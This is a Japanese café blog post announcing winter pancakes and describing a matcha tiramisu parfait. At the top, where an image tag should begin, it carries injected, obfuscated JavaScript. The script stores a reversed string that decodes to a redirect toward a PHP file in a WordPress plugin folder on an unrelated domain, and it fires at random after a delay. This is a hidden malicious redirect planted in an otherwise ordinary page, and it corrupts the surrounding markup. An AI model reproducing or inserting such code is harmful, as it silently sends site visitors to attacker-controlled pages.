ミッシュハウスからのお知らせ

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);} class=”alignnone size-medium wp-image-3087″ src=”https://www.missu-house.com/wp-content/uploads/2019/12/DSC04821-1024×682.jpg” alt=”” width=”1024″ height=”682″ />

こんにちは☆彡
早くも12月に突入してしまいましたね!一年あっという間に終わってしまいます((+_+))

さて、寒くなりましたがミッシュハウスは元気に営業しております。

今日からパンケーキも始まりました♪

今年はソフトクリームもついているので、ソフトもアイスもパンケーキも

楽しめちゃいますよ(^v^)

 

写真は、「抹茶ティラミスパフェ」です。

抹茶ゼリーに濃厚なチーズクリーム、抹茶ティラミスアイスを合わせました。

抹茶ティラミスアイスは、昔チーズアイスを作った後に、間違ってそのまま

機械に抹茶アイスのベースを入れてしまい、それを食べてみたら美味しくて

商品化したアイスだと聞いています(^v^)

偶然にもおいしいアイスができることあるんですね☆笑

ただ、カップアイスにはしていないので、レアアイテムではあります♪

パフェで使うときしか食べられる機会がないので、これを機にぜひ

食べてみてください♪

味的には抹茶のほうが強めですね。チーズはほんのりって感じです。

ただ、チーズクリームが入っているので一緒に食べるとなお美味しいです☆

次回はパンケーキのこと書きますね!

楽しみにお待ちください~(^◇^)

 

 

 

コメント

  1. この記事へのコメントはありません。

  1. この記事へのトラックバックはありません。